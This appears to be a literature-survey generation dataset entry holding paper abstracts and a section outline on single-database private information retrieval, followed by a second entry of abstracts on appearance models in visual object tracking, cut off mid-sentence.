homomorphic public-key cryptosystem is IND-CPA secure. It can be transformed to a one-round computationally receiver-private and information-theoretically sender-private 1-out-of-n oblivious-transfer protocol for l-bit strings, that has the same asymptotic communication and is private in the standard complexity-theoretic model. --- paper_title: Single Database Private Information Retrieval with Logarithmic Communication paper_content: We study the problem of single database private information retrieval, and present a solution with only logarithmic server-side communication complexity and a solution with only logarithmic user-side communication complexity. Previously the best result could only achieve polylogarithmic communication on each side, and was based on certain less well-studied assumptions in number theory [6]. On the contrary, our schemes are based on Paillier's cryptosystem [16], which along with its variants have drawn extensive studies in recent cryptographic researches [3, 4, 8, 9], and have many important applications [7, 8].
--- paper_title: Replication is not needed: single database, computationally-private information retrieval paper_content: We establish the following, quite unexpected, result: replication of data for the computational private information retrieval problem is not necessary. More specifically, based on the quadratic residuosity assumption, we present a single database, computationally private information retrieval scheme with O(n/sup /spl epsiv//) communication complexity for any /spl epsiv/>0. --- paper_title: A Generalisation, a Simplification and some Applications of Paillier’s Probabilistic Public-Key System paper_content: We propose a generalisation of Paillier's probabilistic public key system, in which the expansion factor is reduced and which allows to adjust the block length of the scheme even after the public key has been fixed, without losing the homomorphic property. We show that the generalisation is as secure as Paillier's original system. We construct a threshold variant of the generalised scheme as well as zero-knowledge protocols to show that a given ciphertext encrypts one of a set of given plaintexts, and protocols to verify multiplicative relations on plaintexts. We then show how these building blocks can be used for applying the scheme to efficient electronic voting. This reduces dramatically the work needed to compute the final result of an election, compared to the previously best known schemes. We show how the basic scheme for a yes/no vote can be easily adapted to casting a vote for up to t out of L candidates. The same basic building blocks can also be adapted to provide receipt-free elections, under appropriate physical assumptions. The scheme for 1 out of L elections can be optimised such that for a certain range of parameter values, a ballot has size only O(log L) bits. --- paper_title: An oblivious transfer protocol with log-squared communication paper_content: We propose a one-round 1-out-of-n computationally-private information retrieval protocol for l-bit strings with low-degree polylogarithmic receiver-computation, linear sender-computation and communication Θ(klog2n+llogn), where k is a possibly non-constant security parameter. The new protocol is receiver-private if the underlying length-flexible additively homomorphic public-key cryptosystem is IND-CPA secure. It can be transformed to a one-round computationally receiver-private and information-theoretically sender-private 1-out-of-n oblivious-transfer protocol for l-bit strings, that has the same asymptotic communication and is private in the standard complexity-theoretic model. --- paper_title: Single Database Private Information Retrieval with Logarithmic Communication paper_content: We study the problem of single database private information retrieval, and present a solution with only logarithmic server-side communication complexity and a solution with only logarithmic user-side communication complexity. Previously the best result could only achieve polylogarithmic communication on each side, and was based on certain less well-studied assumptions in number theory [6]. On the contrary, our schemes are based on Paillier’s cryptosystem [16], which along with its variants have drawn extensive studies in recent cryptographic researches [3, 4, 8, 9], and have many important applications [7, 8]. 
--- paper_title: Universal one-way hash functions and their cryptographic applications paper_content: We define a Universal One-Way Hash Function family, a new primitive which enables the compression of elements in the function domain. The main property of this primitive is that, given an element x in the domain, it is computationally hard to find a different domain element which collides with x. We prove constructively that universal one-way hash functions exist if any 1-1 one-way functions exist. Among the various applications of the primitive is a One-Way based Secure Digital Signature Scheme, a system which is based on the existence of any 1-1 One-Way Functions and is secure against the most general attack known. Previously, all provably secure signature schemes were based on the stronger mathematical assumption that trapdoor one-way functions exist. --- paper_title: Computationally private information retrieval with polylogarithmic communication paper_content: We present a single-database computationally private information retrieval scheme with polylogarithmic communication complexity. Our construction is based on a new, but reasonable intractability assumption, which we call the φ-Hiding Assumption (φHA): essentially the difficulty of deciding whether a small prime divides φ(m), where m is a composite integer of unknown factorization. --- paper_title: Single Database Private Information Retrieval with Logarithmic Communication paper_content: We study the problem of single database private information retrieval, and present a solution with only logarithmic server-side communication complexity and a solution with only logarithmic user-side communication complexity. Previously the best result could only achieve polylogarithmic communication on each side, and was based on certain less well-studied assumptions in number theory [6]. On the contrary, our schemes are based on Paillier's cryptosystem [16], which along with its variants have drawn extensive studies in recent cryptographic researches [3, 4, 8, 9], and have many important applications [7, 8]. --- paper_title: Computationally private information retrieval with polylogarithmic communication paper_content: We present a single-database computationally private information retrieval scheme with polylogarithmic communication complexity. Our construction is based on a new, but reasonable intractability assumption, which we call the φ-Hiding Assumption (φHA): essentially the difficulty of deciding whether a small prime divides φ(m), where m is a composite integer of unknown factorization. --- paper_title: Single-Database Private Information Retrieval with Constant Communication Rate paper_content: We present a single-database private information retrieval (PIR) scheme with communication complexity ${\mathcal O}(k+d)$, where k ≥ log n is a security parameter that depends on the database size n and d is the bit-length of the retrieved database block. This communication complexity is better asymptotically than previous single-database PIR schemes. The scheme also gives improved performance for practical parameter settings whether the user is retrieving a single bit or very large blocks. For large blocks, our scheme achieves a constant "rate" (e.g., 0.2), even when the user-side communication is very low (e.g., two 1024-bit numbers). Our scheme and security analysis is presented using general groups with hidden smooth subgroups; the scheme can be instantiated using composite moduli, in which case the security of our scheme is based on a simple variant of the "Φ-hiding" assumption by Cachin, Micali and Stadler [2].
--- paper_title: One-way trapdoor permutations are sufficient for non-trivial single-server private information retrieval paper_content: We show that general one-way trapdoor permutations are sufficient to privately retrieve an entry from a database of size n with total communication complexity strictly less than n. More specifically, we present a protocol in which the user sends O(K²) bits and the server sends n - cn/K bits (for any constant c), where K is the security parameter of the trapdoor permutations. Thus, for sufficiently large databases (e.g., when K = n^ε for some small ε) our construction breaks the information-theoretic lower-bound (of at least n bits). This demonstrates the feasibility of basing single-server private information retrieval on general complexity assumptions. An important implication of our result is that we can implement a 1-out-of-n Oblivious Transfer protocol with communication complexity strictly less than n based on any one-way trapdoor permutation. --- paper_title: Universal one-way hash functions and their cryptographic applications paper_content: We define a Universal One-Way Hash Function family, a new primitive which enables the compression of elements in the function domain. The main property of this primitive is that, given an element x in the domain, it is computationally hard to find a different domain element which collides with x. We prove constructively that universal one-way hash functions exist if any 1-1 one-way functions exist. Among the various applications of the primitive is a One-Way based Secure Digital Signature Scheme, a system which is based on the existence of any 1-1 One-Way Functions and is secure against the most general attack known. Previously, all provably secure signature schemes were based on the stronger mathematical assumption that trapdoor one-way functions exist. ---
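The "main property" referred to in the universal one-way hash function reference above is what is now usually called target collision resistance. Stated as a worked definition in LaTeX, with notation chosen here for illustration:

% Target collision resistance of a keyed hash family {H_k} (illustrative notation).
% Unlike ordinary collision resistance, the adversary commits to x before seeing the key.
\[
  \Pr\big[\, k \leftarrow \mathcal{K};\; y \leftarrow A(x, k) \;:\;
        y \neq x \,\wedge\, H_k(y) = H_k(x) \,\big] \;\le\; \mathrm{negl}(\kappa),
\]
% where x is chosen by the adversary A before the key k is sampled and \kappa is the
% security parameter. The cited result shows such families follow from 1-1 one-way functions.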
Title: A survey of single-database private information retrieval: techniques and applications
Section 1: Introduction
Description 1: Write an introduction describing the basics of Single-Database Private Information Retrieval (PIR), its purpose, and the naive solution.
Section 2: Single-Database PIR
Description 2: Discuss the history and foundational works of Single-Database PIR, including significant contributions and key techniques used.
Section 3: Amortizing Database Work in PIR
Description 3: Explain how to amortize the computational work in PIR for multiple queries and the techniques involved in achieving this.
Section 4: Connections: Single Database PIR and OT
Description 4: Outline the connection between Single-Database PIR and Oblivious Transfer (OT), detailing the similarities and transformations between the two.
Section 5: Connections: PIR and Collision-Resistant Hashing
Description 5: Describe how PIR protocols relate to collision-resistant hashing and the implications of this connection.
Section 6: Connections: PIR and Function-Hiding PKE
Description 6: Discuss the relationship between PIR and function-hiding public-key encryption, and the use cases where function-hiding PKE is relevant.
Section 7: Connections: PIR and Complexity Theory
Description 7: Explore the connections between PIR and various complexity theory problems, including secure function evaluation and zero-knowledge arguments.
Section 8: Public-Key Encryption That Supports PIR Read and Write
Description 8: Explain the concept of public-key encryption schemes that allow for PIR queries and data modifications with small communication complexity.
Section 9: Organization of the Rest of the Paper
Description 9: Provide an outline of the remaining sections of the paper and the main focus areas.
Section 10: Balancing the Communication Between Sender and Receiver
Description 10: Discuss techniques for minimizing communication complexity in PIR protocols and how to balance communication between sender and receiver.
Section 11: PIR Based on Group-Homomorphic Encryption
Description 11: Present various PIR protocols based on group-homomorphic encryption, highlighting the generic methods and specific cryptosystems used.
Section 12: Homomorphic Encryption Schemes
Description 12: Explain the principles of homomorphic encryption schemes and their role in constructing PIR protocols.
Section 13: PIR Based on the Φ-Hiding Assumption
Description 13: Introduce the Φ-Hiding Assumption and describe its application in developing PIR protocols with logarithmic communication.
Section 14: Preliminaries
Description 14: Provide the necessary algebraic and cryptographic preliminaries required to understand the PIR protocols based on the Φ-Hiding Assumption.
Section 15: A Brief Description of the Protocol
Description 15: Give a high-level overview of the PIR protocol based on the Φ-Hiding Assumption, including key algorithmic steps.
Section 16: Generalizations: Smooth Subgroups
Description 16: Discuss the generalizations of PIR protocols based on smooth subgroups, including more advanced techniques and optimizations.
Section 17: PIR from Any Trapdoor Permutation
Description 17: Describe the construction of PIR protocols based on general trapdoor permutations and the communication-balancing techniques used.
Section 18: Outline of the Protocol
Description 18: Provide a high-level outline of the PIR protocol based on trapdoor permutations.
Section 19: Sketch of Protocol Details
Description 19: Provide more detailed steps and explanations of the PIR protocol based on trapdoor permutations.
Section 20: Conclusions
Description 20: Summarize the main findings and contributions of the paper, and mention open problems and future research directions in Single-Database PIR.
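A worked instance of the communication balancing discussed in Section 10 of the outline above, using the matrix view of the quadratic-residuosity scheme sketched earlier; the notation is chosen here for illustration:

% Balancing sender and receiver communication (illustrative notation).
% View the n-bit database as an s x t bit matrix with n = s*t. In the basic
% quadratic-residuosity scheme the user sends one k-bit group element per column and
% the server replies with one k-bit group element per row, so the total cost is
\[
  C(s, t) \;=\; k\,(s + t) \quad \text{subject to } s\,t = n,
\]
% which is minimized at s = t = \sqrt{n}, giving C = 2k\sqrt{n} = O(k\sqrt{n}).
% Recursing on the server's answer instead of returning all s row values is what pushes
% the communication down to O(n^{\varepsilon}) in the scheme surveyed above.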
A survey of appearance models in visual object tracking
21
--- paper_title: Real-Time Face Detection and Tracking for Mobile Videoconferencing paper_content: This paper addresses the issue of face detection and tracking in the context of a mobile videoconferencing application. While the integration of such technology into a mobile videophone is advantageous, allowing face stabilization, reduced bandwidth requirements and smaller display sizes, its deployment in such an environment may not be straightforward, since most face detection methods reported in the literature assume at least modest processing capabilities and memory and, usually, floating-point capabilities. The face detection and tracking method which is presented here achieves high performance, robustness to illumination variations and geometric changes, such as viewpoint and scale changes, and at the same time entails a significantly reduced computational complexity. Our method requires only integer operations and very small amounts of memory, of the order of a few hundred bytes, facilitating a real-time implementation on small microprocessors or custom hardware. In this context, this paper will also examine an FPGA implementation of the proposed algorithmic framework which, as will be seen, achieves extremely high frame processing rates at low clock speeds. --- paper_title: A system for video surveillance and monitoring paper_content: Under the three-year Video Surveillance and Monitoring (VSAM) project (1997-1999), the Robotics Institute at Carnegie Mellon University (CMU) and the Sarnoff Corporation developed a system for autonomous Video Surveillance and Monitoring. The technical approach uses multiple, cooperative video sensors to provide continuous coverage of people and vehicles in a cluttered environment. This final report presents an overview of the system, and of the technical accomplishments that have been achieved. --- paper_title: A Novel Method for Tracking and Counting Pedestrians in Real-Time Using a Single Camera paper_content: This paper presents a real-time system for pedestrian tracking in sequences of grayscale images acquired by a stationary camera. The objective is to integrate this system with a traffic control application such as a pedestrian control scheme at intersections. The proposed approach can also be used to detect and track humans in front of vehicles. Furthermore, the proposed schemes can be employed for the detection of several diverse traffic objects of interest (vehicles, bicycles, etc.). The system outputs the spatio-temporal coordinates of each pedestrian during the period the pedestrian is in the scene. Processing is done at three levels: raw images, blobs, and pedestrians. Blob tracking is modeled as a graph optimization problem. Pedestrians are modeled as rectangular patches with a certain dynamic behavior. Kalman filtering is used to estimate pedestrian parameters. The system was implemented on a Datacube MaxVideo 20 equipped with a Datacube Max860 and was able to achieve a peak performance of over 30 frames per second. Experimental results based on indoor and outdoor scenes demonstrated the system's robustness under many difficult situations such as partial or full occlusions of pedestrians. --- paper_title: W4: Real-time surveillance of people and their activities paper_content: W4 is a real-time visual surveillance system for detecting and tracking multiple people and monitoring their activities in an outdoor environment. It operates on monocular gray-scale video imagery, or on video imagery from an infrared camera.
W4 employs a combination of shape analysis and tracking to locate people and their parts (head, hands, feet, torso) and to create models of people's appearance so that they can be tracked through interactions such as occlusions. It can determine whether a foreground region contains multiple people and can segment the region into its constituent people and track them. W4 can also determine whether people are carrying objects, and can segment objects from their silhouettes, and construct appearance models for them so they can be identified in subsequent frames. W4 can recognize events between people and objects, such as depositing an object, exchanging bags, or removing an object. It runs at 25 Hz for 320×240 resolution images on a 400 MHz dual-Pentium II PC. --- paper_title: Visual Interpretation of Hand Gestures for Human-Computer Interaction: A Review paper_content: The use of hand gestures provides an attractive alternative to cumbersome interface devices for human-computer interaction (HCI). In particular, visual interpretation of hand gestures can help in achieving the ease and naturalness desired for HCI. This has motivated a very active research area concerned with computer vision-based analysis and interpretation of hand gestures. We survey the literature on visual interpretation of hand gestures in the context of its role in HCI. This discussion is organized on the basis of the method used for modeling, analyzing, and recognizing gestures. Important differences in the gesture interpretation approaches arise depending on whether a 3D model of the human hand or an image appearance model of the human hand is used. 3D hand models offer a way of more elaborate modeling of hand gestures but lead to computational hurdles that have not been overcome given the real-time requirements of HCI. Appearance-based models lead to computationally efficient "purposive" approaches that work well under constrained situations but seem to lack the generality desirable for HCI. We also discuss implemented gestural systems as well as other potential applications of vision-based gesture recognition. Although the current progress is encouraging, further theoretical as well as computational advances are needed before gestures can be widely used for HCI. We discuss directions of future research in gesture recognition, including its integration with other natural modes of human-computer interaction. --- paper_title: Linear Regression and Adaptive Appearance Models for Fast Simultaneous Modelling and Tracking paper_content: This work proposes an approach to tracking by regression that uses no hard-coded models and no offline learning stage. The Linear Predictor (LP) tracker has been shown to be highly computationally efficient, resulting in fast tracking. Regression tracking techniques tend to require offline learning to learn suitable regression functions. This work removes the need for offline learning and therefore increases the applicability of the technique. The online-LP tracker can simply be seeded with an initial target location, akin to the ubiquitous Lucas-Kanade algorithm that tracks by registering an image template via minimisation. A fundamental issue for all trackers is the representation of the target appearance and how this representation is able to adapt to changes in target appearance over time.
The two proposed methods, LP-SMAT and LP-MED, demonstrate the ability to adapt to large appearance variations by incrementally building an appearance model that identifies modes or aspects of the target appearance and associates these aspects to the Linear Predictor trackers to which they are best suited. Experiments comparing and evaluating regression and registration techniques are presented along with performance evaluations favourably comparing the proposed tracker and appearance model learning methods to other state of the art simultaneous modelling and tracking approaches. --- paper_title: Crowd analysis: a survey paper_content: In the year 1999 the world population reached 6 billion, doubling the previous census estimate of 1960. Recently, the United States Census Bureau issued a revised forecast for world population showing a projected growth to 9.4 billion by 2050 (US Census Bureau, http://www.census.gov/ipc/www/worldpop.html). Different research disci- plines have studied the crowd phenomenon and its dynamics from a social, psychological and computational standpoint respectively. This paper presents a survey on crowd analysis methods employed in computer vision research and discusses perspectives from other research disciplines and how they can contribute to the computer vision approach. --- paper_title: Survey of Pedestrian Detection for Advanced Driver Assistance Systems paper_content: Advanced driver assistance systems (ADASs), and particularly pedestrian protection systems (PPSs), have become an active research area aimed at improving traffic safety. The major challenge of PPSs is the development of reliable on-board pedestrian detection systems. Due to the varying appearance of pedestrians (e.g., different clothes, changing size, aspect ratio, and dynamic shape) and the unstructured environment, it is very difficult to cope with the demanded robustness of this kind of system. Two problems arising in this research area are the lack of public benchmarks and the difficulty in reproducing many of the proposed methods, which makes it difficult to compare the approaches. As a result, surveying the literature by enumerating the proposals one--after-another is not the most useful way to provide a comparative point of view. Accordingly, we present a more convenient strategy to survey the different approaches. We divide the problem of detecting pedestrians from images into different processing steps, each with attached responsibilities. Then, the different proposed methods are analyzed and classified with respect to each processing stage, favoring a comparative viewpoint. Finally, discussion of the important topics is presented, putting special emphasis on the future needs and challenges. --- paper_title: Research on Intelligent Visual Surveillance for Public Security paper_content: Intelligent visual surveillance plays an important role in the assurance of the public security, it is different from traditional passive video surveillance, it transforms the computer role from "Looking at People" to "Understanding People". In the paper, we review advances in intelligent visual surveillance, and present some future research directions. --- paper_title: On-road vehicle detection: a review paper_content: Developing on-board automotive driver assistance systems aiming to alert drivers about driving environments, and possible collision with other vehicles has attracted a lot of attention lately. In these systems, robust and reliable vehicle detection is a critical step. 
This paper presents a review of recent vision-based on-road vehicle detection systems. Our focus is on systems where the camera is mounted on the vehicle rather than being fixed such as in traffic/driveway monitoring systems. First, we discuss the problem of on-road vehicle detection using optical sensors followed by a brief review of intelligent vehicle research worldwide. Then, we discuss active and passive sensors to set the stage for vision-based vehicle detection. Methods aiming to quickly hypothesize the location of vehicles in an image as well as to verify the hypothesized locations are reviewed next. Integrating detection with tracking is also reviewed to illustrate the benefits of exploiting temporal continuity for vehicle detection. Finally, we present a critical overview of the methods discussed, we assess their potential for future deployment, and we present directions for future research. --- paper_title: Understanding Transit Scenes: A Survey on Human Behavior-Recognition Algorithms paper_content: Visual surveillance is an active research topic in image processing. Transit systems are actively seeking new or improved ways to use technology to deter and respond to accidents, crime, suspicious activities, terrorism, and vandalism. Human behavior-recognition algorithms can be used proactively for prevention of incidents or reactively for investigation after the fact. This paper describes the current state-of-the-art image-processing methods for automatic-behavior-recognition techniques, with focus on the surveillance of human activities in the context of transit applications. The main goal of this survey is to provide researchers in the field with a summary of progress achieved to date and to help identify areas where further research is needed. This paper provides a thorough description of the research on relevant human behavior-recognition methods for transit surveillance. Recognition methods include single person (e.g., loitering), multiple-person interactions (e.g., fighting and personal attacks), person-vehicle interactions (e.g., vehicle vandalism), and person-facility/location interactions (e.g., object left behind and trespassing). A list of relevant behavior-recognition papers is presented, including behaviors, data sets, implementation details, and results. In addition, algorithm's weaknesses, potential research directions, and contrast with commercial capabilities as advertised by manufacturers are discussed. This paper also provides a summary of literature surveys and developments of the core technologies (i.e., low-level processing techniques) used in visual surveillance systems, including motion detection, classification of moving objects, and tracking. --- paper_title: Object tracking: A survey paper_content: The goal of this article is to review the state-of-the-art tracking methods, classify them into different categories, and identify new trends. Object tracking, in general, is a challenging problem. Difficulties in tracking objects can arise due to abrupt object motion, changing appearance patterns of both the object and the scene, nonrigid object structures, object-to-object and object-to-scene occlusions, and camera motion. Tracking is usually performed in the context of higher-level applications that require the location and/or shape of the object in every frame. Typically, assumptions are made to constrain the tracking problem in the context of a particular application. 
In this survey, we categorize the tracking methods on the basis of the object and motion representations used, provide detailed descriptions of representative methods in each category, and examine their pros and cons. Moreover, we discuss the important issues related to tracking including the use of appropriate image features, selection of motion models, and detection of objects. --- paper_title: Modeling inter-camera space – time and appearance relationships for tracking across non-overlapping views paper_content: Tracking across cameras with non-overlapping views is a challenging problem. Firstly, the observations of an object are often widely separated in time and space when viewed from non-overlapping cameras. Secondly, the appearance of an object in one camera view might be very different from its appearance in another camera view due to the differences in illumination, pose and camera properties. To deal with the first problem, we observe that people or vehicles tend to follow the same paths in most cases, i.e., roads, walkways, corridors etc. The proposed algorithm uses this conformity in the traversed paths to establish correspondence. The algorithm learns this conformity and hence the inter-camera relationships in the form of multivariate probability density of space-time variables (entry and exit locations, velocities, and transition times) using kernel density estimation. To handle the appearance change of an object as it moves from one camera to another, we show that all brightness transfer functions from a given camera to another camera lie in a low dimensional subspace. This subspace is learned by using probabilistic principal component analysis and used for appearance matching. The proposed approach does not require explicit inter-camera calibration, rather the system learns the camera topology and subspace of inter-camera brightness transfer functions during a training phase. Once the training is complete, correspondences are assigned using the maximum likelihood (ML) estimation framework using both location and appearance cues. Experiments with real world videos are reported which validate the proposed approach. --- paper_title: D.: Computational Studies of Human Motion: Part 1, Tracking and Motion Synthesis paper_content: We review methods for kinematic tracking of the human body in video. The review is part of a projected book that is intended to cross-fertilize ideas about motion representation between the animation and computer vision communities. The review confines itself to the earlier stages of motion, focusing on tracking and motion synthesis; future material will cover activity representation and motion generation. --- paper_title: A Review of Visual Tracking paper_content: This report contains a review of visual tracking in monocular video sequences. For the purpose of this review, the majority of the visual trackers in the literature are divided into three tracking categories: discrete feature trackers, contour trackers, and region-based trackers. This categorization was performed based on the features used and the algorithms employed by the various visual trackers. The first class of trackers represents targets as discrete features (e.g. points, sets of points, lines) and performs data association using a distance metric that accommodates the particular feature. Contour trackers provide precise outlines of the target boundaries, meaning that they must not only uncover the position of the target, but its shape as well. 
Contour trackers often make use of gradient edge information during the tracking process. Region trackers represent the target with area-based descriptors that define its support and attempt to locate the image region in the current frame that best matches an object template. Trackers that are not in agreement with the abovementioned categorization, including those that combine methods from the three defined classes, are also considered in this review. In addition to categorizing and describing the various visual trackers in the literature, this review also provides a commentary on the current state of the field as well as a comparative analysis of the various approaches. The paper concludes with an outline of open problems in visual tracking. --- paper_title: Crowd analysis: a survey paper_content: In the year 1999 the world population reached 6 billion, doubling the previous census estimate of 1960. Recently, the United States Census Bureau issued a revised forecast for world population showing a projected growth to 9.4 billion by 2050 (US Census Bureau, http://www.census.gov/ipc/www/worldpop.html). Different research disci- plines have studied the crowd phenomenon and its dynamics from a social, psychological and computational standpoint respectively. This paper presents a survey on crowd analysis methods employed in computer vision research and discusses perspectives from other research disciplines and how they can contribute to the computer vision approach. --- paper_title: Survey of Pedestrian Detection for Advanced Driver Assistance Systems paper_content: Advanced driver assistance systems (ADASs), and particularly pedestrian protection systems (PPSs), have become an active research area aimed at improving traffic safety. The major challenge of PPSs is the development of reliable on-board pedestrian detection systems. Due to the varying appearance of pedestrians (e.g., different clothes, changing size, aspect ratio, and dynamic shape) and the unstructured environment, it is very difficult to cope with the demanded robustness of this kind of system. Two problems arising in this research area are the lack of public benchmarks and the difficulty in reproducing many of the proposed methods, which makes it difficult to compare the approaches. As a result, surveying the literature by enumerating the proposals one--after-another is not the most useful way to provide a comparative point of view. Accordingly, we present a more convenient strategy to survey the different approaches. We divide the problem of detecting pedestrians from images into different processing steps, each with attached responsibilities. Then, the different proposed methods are analyzed and classified with respect to each processing stage, favoring a comparative viewpoint. Finally, discussion of the important topics is presented, putting special emphasis on the future needs and challenges. --- paper_title: Research on Intelligent Visual Surveillance for Public Security paper_content: Intelligent visual surveillance plays an important role in the assurance of the public security, it is different from traditional passive video surveillance, it transforms the computer role from "Looking at People" to "Understanding People". In the paper, we review advances in intelligent visual surveillance, and present some future research directions. 
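Several of the tracking references above (for example, the real-time pedestrian tracker) rely on Kalman filtering to estimate target parameters such as the centroid of a rectangular patch. A minimal constant-velocity Kalman filter sketch in Python follows; the state layout, noise levels, and synthetic measurements are illustrative assumptions and are not taken from any of the cited systems.

# Minimal constant-velocity Kalman filter for a tracked 2-D centroid (illustrative values).
import numpy as np

dt = 1.0                                    # one frame between updates
F = np.array([[1, 0, dt, 0],                # state transition for state [x, y, vx, vy]
              [0, 1, 0, dt],
              [0, 0, 1, 0],
              [0, 0, 0, 1]], dtype=float)
H = np.array([[1, 0, 0, 0],                 # only the position (x, y) is measured
              [0, 1, 0, 0]], dtype=float)
Q = 0.01 * np.eye(4)                        # process noise covariance (assumed)
R = 4.0 * np.eye(2)                         # measurement noise covariance (assumed)

x = np.array([0.0, 0.0, 1.0, 0.5])          # initial state guess
P = 10.0 * np.eye(4)                        # initial state covariance

def kalman_step(x, P, z):
    # Predict
    x_pred = F @ x
    P_pred = F @ P @ F.T + Q
    # Update with measurement z = (x, y)
    y = z - H @ x_pred                      # innovation
    S = H @ P_pred @ H.T + R                # innovation covariance
    K = P_pred @ H.T @ np.linalg.inv(S)     # Kalman gain
    return x_pred + K @ y, (np.eye(4) - K @ H) @ P_pred

# Fake noisy centroid detections of a target moving roughly along a line.
rng = np.random.default_rng(0)
for t in range(1, 11):
    z = np.array([1.0 * t, 0.5 * t]) + rng.normal(0, 2.0, size=2)
    x, P = kalman_step(x, P, z)
print("estimated position:", x[:2], "estimated velocity:", x[2:])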
--- paper_title: On-road vehicle detection: a review paper_content: Developing on-board automotive driver assistance systems aiming to alert drivers about driving environments, and possible collision with other vehicles has attracted a lot of attention lately. In these systems, robust and reliable vehicle detection is a critical step. This paper presents a review of recent vision-based on-road vehicle detection systems. Our focus is on systems where the camera is mounted on the vehicle rather than being fixed such as in traffic/driveway monitoring systems. First, we discuss the problem of on-road vehicle detection using optical sensors followed by a brief review of intelligent vehicle research worldwide. Then, we discuss active and passive sensors to set the stage for vision-based vehicle detection. Methods aiming to quickly hypothesize the location of vehicles in an image as well as to verify the hypothesized locations are reviewed next. Integrating detection with tracking is also reviewed to illustrate the benefits of exploiting temporal continuity for vehicle detection. Finally, we present a critical overview of the methods discussed, we assess their potential for future deployment, and we present directions for future research. --- paper_title: Understanding Transit Scenes: A Survey on Human Behavior-Recognition Algorithms paper_content: Visual surveillance is an active research topic in image processing. Transit systems are actively seeking new or improved ways to use technology to deter and respond to accidents, crime, suspicious activities, terrorism, and vandalism. Human behavior-recognition algorithms can be used proactively for prevention of incidents or reactively for investigation after the fact. This paper describes the current state-of-the-art image-processing methods for automatic-behavior-recognition techniques, with focus on the surveillance of human activities in the context of transit applications. The main goal of this survey is to provide researchers in the field with a summary of progress achieved to date and to help identify areas where further research is needed. This paper provides a thorough description of the research on relevant human behavior-recognition methods for transit surveillance. Recognition methods include single person (e.g., loitering), multiple-person interactions (e.g., fighting and personal attacks), person-vehicle interactions (e.g., vehicle vandalism), and person-facility/location interactions (e.g., object left behind and trespassing). A list of relevant behavior-recognition papers is presented, including behaviors, data sets, implementation details, and results. In addition, algorithm's weaknesses, potential research directions, and contrast with commercial capabilities as advertised by manufacturers are discussed. This paper also provides a summary of literature surveys and developments of the core technologies (i.e., low-level processing techniques) used in visual surveillance systems, including motion detection, classification of moving objects, and tracking. --- paper_title: Object tracking: A survey paper_content: The goal of this article is to review the state-of-the-art tracking methods, classify them into different categories, and identify new trends. Object tracking, in general, is a challenging problem. Difficulties in tracking objects can arise due to abrupt object motion, changing appearance patterns of both the object and the scene, nonrigid object structures, object-to-object and object-to-scene occlusions, and camera motion. 
Tracking is usually performed in the context of higher-level applications that require the location and/or shape of the object in every frame. Typically, assumptions are made to constrain the tracking problem in the context of a particular application. In this survey, we categorize the tracking methods on the basis of the object and motion representations used, provide detailed descriptions of representative methods in each category, and examine their pros and cons. Moreover, we discuss the important issues related to tracking including the use of appropriate image features, selection of motion models, and detection of objects. --- paper_title: Computational Studies of Human Motion: Part 1, Tracking and Motion Synthesis paper_content: We review methods for kinematic tracking of the human body in video. The review is part of a projected book that is intended to cross-fertilize ideas about motion representation between the animation and computer vision communities. The review confines itself to the earlier stages of motion, focusing on tracking and motion synthesis; future material will cover activity representation and motion generation. --- paper_title: Increasing the discrimination power of the co-occurrence matrix-based features paper_content: This paper is concerned with an approach to exploiting information available from the co-occurrence matrices computed for different distance parameter values. A polynomial of degree n is fitted to each of 14 Haralick's coefficients computed from the average co-occurrence matrices evaluated for several distance parameter values. Parameters of the polynomials constitute a set of new features. The experimental investigations performed substantiated the usefulness of the approach. --- paper_title: Sigma Set Based Implicit Online Learning for Object Tracking paper_content: This letter presents a novel object tracking approach within the Bayesian inference framework through implicit online learning. 
In our approach, the target is represented by multiple patches, each of which is encoded by a powerful and efficient region descriptor called Sigma set. To model each target patch, we propose to utilize the online one-class support vector machine algorithm, named Implicit online Learning with Kernels Model (ILKM). ILKM is simple, efficient, and capable of learning a robust online target predictor in the presence of appearance changes. Responses of ILKMs related to multiple target patches are fused by an arbitrator with an inference of possible partial occlusions, to make the decision and trigger the model update. Experimental results demonstrate that the proposed tracking approach is effective and efficient in ever-changing and cluttered scenes. --- paper_title: A novel supervised level set method for non-rigid object tracking paper_content: We present a novel approach to non-rigid object tracking based on a supervised level set model (SLSM). In contrast with conventional level set models, which emphasize the intensity consistency only and consider no priors, the curve evolution of the proposed SLSM is object-oriented and supervised by the specific knowledge of the target we want to track. Therefore, the SLSM can ensure a more accurate convergence to the target in tracking applications. In particular, we firstly construct the appearance model for the target in an on-line boosting manner due to its strong discriminative power between objects and background. Then the probability of the contour is modeled by considering both the region and edge cues in a Bayesian manner, leading the curve converge to the candidate region with maximum likelihood of being the target. Finally, accurate target region qualifies the samples fed the boosting procedure as well as the target model prepared for the next time step. Positive decrease rate is used to adjust the learning pace over time, enabling tracking to continue under partial and total occlusion. Experimental results on a number of challenging sequences validate the effectiveness of the technique. --- paper_title: Point matching under large image deformations and illumination changes paper_content: To solve the general point correspondence problem in which the underlying transformation between image patches is represented by a homography, a solution based on extensive use of first order differential techniques is proposed. We integrate in a single robust M-estimation framework the traditional optical flow method and matching of local color distributions. These distributions are computed with spatially oriented kernels in the 5D joint spatial/color space. The estimation process is initiated at the third level of a Gaussian pyramid, uses only local information, and the illumination changes between the two images are also taken into account. Subpixel matching accuracy is achieved under large projective distortions significantly exceeding the performance of any of the two components alone. As an application, the correspondence algorithm is employed in oriented tracking of objects. --- paper_title: Efficient mean-shift tracking via a new similarity measure paper_content: The mean shift algorithm has achieved considerable success in object tracking due to its simplicity and robustness. It finds local minima of a similarity measure between the color histograms or kernel density estimates of the model and target image. The most typically used similarity measures are the Bhattacharyya coefficient or the Kullback-Leibler divergence. 
In practice, these approaches face three difficulties. First, the spatial information of the target is lost when the color histogram is employed, which precludes the application of more elaborate motion models. Second, the classical similarity measures are not very discriminative. Third, the sample-based classical similarity measures require a calculation that is quadratic in the number of samples, making real-time performance difficult. To deal with these difficulties we propose a new, simple-to-compute and more discriminative similarity measure in spatial-feature spaces. The new similarity measure allows the mean shift algorithm to track more general motion models in an integrated way. To reduce the complexity of the computation to linear order we employ the recently proposed improved fast Gauss transform. This leads to a very efficient and robust nonparametric spatial-feature tracking algorithm. The algorithm is tested on several image sequences and shown to achieve robust and reliable frame-rate tracking. --- paper_title: Online visual tracking with histograms and articulating blocks paper_content: We propose an algorithm for accurate tracking of articulated objects using online update of appearance and shape. The challenge here is to model foreground appearance with histograms in a way that is both efficient and accurate. In this algorithm, the constantly changing foreground shape is modeled as a small number of rectangular blocks, whose positions within the tracking window are adaptively determined. Under the general assumption of stationary foreground appearance, we show that robust object tracking is possible by adaptively adjusting the locations of these blocks. Implemented in MATLAB without substantial optimization, our tracker runs already at 